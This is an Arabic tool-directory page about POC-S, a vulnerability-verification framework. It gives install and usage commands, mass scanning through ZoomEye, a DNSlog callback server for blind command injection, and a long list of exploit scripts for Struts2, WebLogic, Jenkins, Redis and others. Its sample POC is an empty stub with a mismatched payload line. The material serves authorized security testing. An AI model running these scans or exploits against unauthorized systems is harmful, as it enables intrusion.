Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
POC-S — نسخة معززة من POC-T هي POC-S، تُستخدم للتحقق السريع من ثغرات تطبيقات الويب في مواجهة الفريق الأحمر والأزرق، مع تعزيز الوظائف وإضافة نصوص برمجية مصنفة، وتأتي مع سجل DNS مدمج وغيرها. المنصة تكمّل بوكسات عالية التوفر من أجهزة vulhub المستهدفة ومشاريع مفتوحة المصدر أخرى. | Kitploit
أدوات/GitHubGitHub/jiangsir404/poc-s
الاستطلاعماسحات الثغرات الأمنيةأطر الاستغلالجمع المعلوماتأمن الويبالاختبار العشوائياختبار الاختراقتحليل DNS
GitHubjiangsir404/poc-s

POC-S

نسخة معززة من POC-T هي POC-S، تُستخدم للتحقق السريع من ثغرات تطبيقات الويب في مواجهة الفريق الأحمر والأزرق، مع تعزيز الوظائف وإضافة نصوص برمجية مصنفة، وتأتي مع سجل DNS مدمج وغيرها. المنصة تكمّل بوكسات عالية التوفر من أجهزة vulhub المستهدفة ومشاريع مفتوحة المصدر أخرى.

عرض المستودع
35664منذ 6 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

POC-S: POC-T Strengthen Version - الإصدار المعزز من POC-T

وثائق POC-T موجودة في مجلد doc

مقدمة: حالياً

إخلاء مسؤولية قانوني

استخدام POC-S لاستهداف أي هدف دون موافقة مسبقة من الطرفين غير قانوني. POC-S مخصص لأغراض اختبار الأمان فقط

المميزات

  • متوافق مع بناء جملة POC-T
  • تصنيف جيد لـ POC، وطريقة تحميل مرنة، تدعم التحميل من ملف واحد، دفعة واحدة، أو أي مجلد
  • توفير أوامر طرفية pocs/poc-s لفصل الإطار عن POC، ويمكن وضع POC المخصص في أي مجلد
  • توفير منصة DNS بسيطة، تحتاج فقط إلى اسم نطاق واحد وعنوان IP عام، يمكن استخدامها للتحقق السريع من حقن الأوامر العمياء وحقن SQL، بسيطة وفعالة
  • توفير نصوص اختبار وحدة جيدة

المهام المتبقية

  • جمع وتحسين POC بناءً على أجهزة vulhub والمشاريع مفتوحة المصدر، راجع تصنيف POC الخاص بي
  • توفير معامل --init لتحديث ملف التكوين tookit.conf ديناميكياً، مثال: --init zoomeye لتهيئة معلومات تكوين zoomeye
  • إضافة منصات dnslog و weblog للتحقق السريع من الثغرات
  • إضافة إضافتي التحقق ceye.py و dnslog.py
  • إضافة pocsapi.py، بوظائف مشابهة لـ sqlmapapi
  • إضافة إصدار Python 3 من POC-S

الاستخدام

نظراً لأن واجهات الطرف الثالث تتطلب مصادقة، يمكن استخدام معامل --init لتهيئة تكوينات الواجهة الخاصة بك، مثال: --init zoomeye

root@kitploit:~
pip install pocs

التثبيت من المصدر:

root@kitploit:~
git clone https://github.com/jiangsir404/POC-S.git
mv pocs/toolkit.conf.bak mv pocs/toolkit.conf
python setup.py install

إذا ظهر خطأ 'Some files missing' أثناء تثبيت pocs عبر pip، فانتقل إلى دليل تثبيت pocs (python2.7\Lib\site-packages\pocs) وأعد تسمية tookit.conf. إذا ظهر تحذير WARNING: Generating metadata for package cachetools produced metadata for project name unknown. Fix your #egg=cachetools fragments. فهو مشكلة في تبعيات الحزمة. يرجى التحقق من إصدارات الحزم وتحديثها: setuptools==39.0.1 cachetools==3.1.1 google-api-python-client==1.7.11

  1. طريقة تحميل إضافات أكثر مرونة
root@kitploit:~
pocs -s test/test2.py -iS 127.0.0.1 # تحميل السكربت script/test/test2.py
pocs -s test2 -iS 127.0.0.1 # تحميل السكربت script/test2.py

pocs -b test -iS 127.0.0.1 # تحميل جميع السكربتات في مجلد /script/test دفعة واحدة
pocs -b test -s test2.py -iS 127.0.0.1 # تحميل السكربت script/test/test2.py

pocs -s myself_script.py -iS 127.0.0.1 # تحميل سكربت مخصص ومجلد السكربتات المخصصة
pocs -b mydir -iS 127.0.0.1
  1. استخدام محركات البحث
root@kitploit:~
pocs --init zoomeye // تهيئة معلومات تكوين zoomeye
pocs -b redis -t 50 -aZ "port:6379" --limit 50 -o res.txt
pocs -s test2.py -aZ "ThinkPHP"

استخدام ZoomEye للبحث الجماعي عن ثغرة CNVD-2020-10487 tomcat ajp lfi

root@kitploit:~
pip install pocs
pocs -b apache -aZ "app:tomcat" --limit 50 -t 30 -o ajp.txt

  1. استخدام منصة dnslog

إذا كنت لا تزال تعاني من عدم استقرار ceye، وليس لديك الوقت أو الطاقة لبناء منصة DNSLog (تحتاج إلى اسمي نطاق وعنوان IP عام، كما يجب أن يكون النطاق قادراً على تعديل خوادم DNS)، فجرّب منصة dnslog البسيطة التي يوفرها POC-S، والتي تحتاج فقط إلى اسم نطاق واحد وعنوان IP عام، وتوفر واجهة API للتحقق (بدون واجهة).

افترض أن dnslog.xxx.cn هو اسم النطاق العام الخاص بك، و x.x.x.x هو عنوان IP العام، تأكد من أن dnslog.xxx.cn يمكن حله إلى x.x.x.x بشكل صحيح، وإلا فلن تتمكن من الوصول إلى API.

قم بتشغيل الأمر على الخادم العام (x.x.x.x):

root@kitploit:~
pip install pocs
pocs_dnslog -h 0.0.0.0 -p 88 (إذا لم يتم التثبيت عبر pip، يمكن تشغيل السكربت pocs.dnslog.py مباشرة)
>>> dns domain: dnslog.xxx.cn
>>> api key: rivir
>>>dns ip: x.x.x.x

أمر سجل DNS، يدعم فقط أمر nslookup: nslookup 1234.dnslog.xxx.cn x.x.x.x

إذا كنت تريد استخدام الأمر ping 1234.dnslog.xxx.cn، يمكنك أيضاً تكوين خادم أسماء مخصص لنطاق xxx.cn (راجع تكوين DNSLog).

أمر سجل الويب: curl http://dnslog.xxx.cn:88/weblog/poc123

عنوان واجهة API: http://x.x.x.x:88/api/?token={token}&type={dns}&filter=1234.dnslog.xxx.cn المعلمات: - token (مطلوب) مفتاح API الذي أدخلته عند بناء dnslog - type (مطلوب) القيم الممكنة: dns / web - filter (اختياري) لتصفية السجلات، تطابق تام

POC

pocs توفر طريقة أكثر مرونة لتصنيف الإضافات. حالياً، هناك أربعة أنواع من POC: Fuzz POC, OWASP POC, Vuln POC, Tool POC. سيتم جمع بعض POC من GitHub قدر الإمكان، ولكن ليس كثيراً، لذا ستحتاج إلى جمعها وتنظيمها بنفسك.

سيتم كتابة POC بأكبر قدر ممكن من التوحيد القياسي، مع اتباع نمط كتابة POC-T. مثال أدناه:

root@kitploit:~
#!/usr/bin/env python		
#coding:utf-8

"""
ThinkPHP5 <=5.0.22/<=5.1.29 远程代码执行漏洞

Desc
    2018年12月10日中午,thinkphp官方公众号发布了一个更新通知,包含了一个5.x系列所有版本存在被getshell的高风险漏洞。
    由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,
    受影响的版本包括5.0.23和5.1.31之前的所有版本,推荐尽快更新到最新版本。
Version
	ThinkPHP5.0 版本 <= 5.0.22 ThinkPHP5.1 版本 <= 5.1.29
Usage:
	1. python POC-S.py -s 
	2. POC: /wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://lj.s7star.cn/info.txt
Referer
	https://www.seebug.org/vuldb/ssvid-9771
"""

import requests

def poc(url):
    pass

Vuln POC

مشتق أساساً من كتابة إضافات vulhub وإضافات POC-T المضمنة، مع إضافة بعض POC عالية القابلية للاستخدام. كل POC مدرج أدناه تم التحقق منه من خلال بناء بيئة اختبار خاصة، إذا كان هناك أي POC خاطئ، يرجى فتح issue للتواصل معي.

  • struts2
    • s2-005.py
    • s2-015.py
    • s2-016.py
    • s2-032.py
    • s2-045.py
    • s2-052.py
    • s2-053.py
    • s2-057.py
    • struts2-devmode.py
  • weblogic
    • weblogic-ssrf-netmap.py cve-2014-4210
    • weblogc-cve-2017-10271.py (CVE-2017-10271)
    • weblogic-cve-2018-2628.py
    • weblogic-cve-2019-2725.py
    • weblogic-cve-2019-2729.py

Fuzz POC

المصدر: boy-hack/POC-T

  • bakfile: كشف الملفات الاحتياطية
  • crossdomain: crossdomain
  • dzxss
  • gitleak
  • issparse
  • ms15-034
  • phpinfo
  • phpmyadmin
  • svnleak
  • swf
  • tomcat_xmlleak
  • wordspace

OWASP POC

المصدر: نصوص كشف hunter

  • cmd_exec
  • sql_injection
  • xss
  • xxe
  • csrf
  • jsonp_xss
  • jsonp_hijacking
  • file_read
  • ssti
  • ssrf

Tool POC

بعض POC الأدوات الشائعة، توفر محركات بحث، استعلام معلومات، إلخ.

  • bing-dork: بحث Bing
  • bingc: استعلام عكسي عن IP إلى نطاق، ونطاقات القطاع C بناءً على محرك بحث Bing
  • google-dork: بحث Google
  • cdn-detect: كشف CDN
  • waf: كشف WAF وإرجاع عناوين URL بدون WAF
  • craw: استخراج العناوين ذات الصلة من الروابط
  • vulscan: كشف ثغرات حقن SQL
  • portscan: فحص المنافذ، كشف خدمات كلمات المرور الضعيفة
  • domain2ip: استعلام عن IP النطاق
  • whois: استعلام معلومات whois
  • icp: استعلام ICP

POC مفتوحة المصدر أخرى، مثل مشروع https://github.com/boy-hack/airbug الذي يجمع بعض POC يمكن استخدامها مباشرة، ولكن هناك مكتبة HackRequest مخصصة لـ Python 3، يلزم تعديلها لـ Python 2. يمكن تثبيت المكتبة المعدلة من: https://github.com/jiangsir404/hack-requests

تنزيل الأداة
  • weblogic-cve-2020-2551.py
  • weblogic-upload-getshell.py (CVE-2018-2894)
  • thinkphp
    • 5-rce
    • 5.0.23-rce
  • Jenkins
    • jenkins-cve-2015-8103.py
    • jenkins-cve-2017-1000353.py
    • jenkins-cve-2018-1000861.py
  • weakpass
    • mysql
    • redis
    • mongo
    • sqlserver
    • ftp
    • telent
    • web弱口令 (عام بدون كود تحقق للوحة التحكم)
    • http-basic-auth
    • coremail
    • jboss
    • jenkins
    • weblogic
  • unauth
    • redis-unauth.py
    • mongodb-unauth.py
    • memcached-unauth.py
    • elasticsearch-unauth.py
    • kubernetes-unauth.py
    • jenkins-unauth.py
    • docker-unauth-rce.py
    • hadoop-unauth.py
  • apache
    • CNVD-2020-10487 tomcat-ajp-lfi.py
    • tomcat-upload.py
    • tomcat-weak-pass.py
  • Citrix
    • cve-2019-19781
  • supervisor
    • supervisord-RCE-CVE-2017-11610.py
  • Jboss
    • jboss-rce.py
    • CVE-2017-12149
    • CVE-2013-4810
  • spring
    • spring-oauth2-rce.py
    • cve-2018-1273
  • phpmyadmin
    • phpmyadmin-auth-rce.py
    • phpmyadmin4.8.1-RFI.py
  • kibana
    • cve-2019-7609
    • cve-2018-17246
  • php
    • fpm-rce.py
    • CVE-2019-11043
    • CVE-2018-19518
  • discuz
    • x3.4-arbitrary-file-deletion
  • zabbix
    • zabbix-jsrpc-mysql-exp.py
    • zabbix-jsrpc-sqli.py
    • zabbix-weakpass.py
    • zabbix_latest_sqli.py
  • dns-zone-transfer
  • confluence
    • confulence-traversal.py
    • confluence تجاوز المسار وتنفيذ الأوامر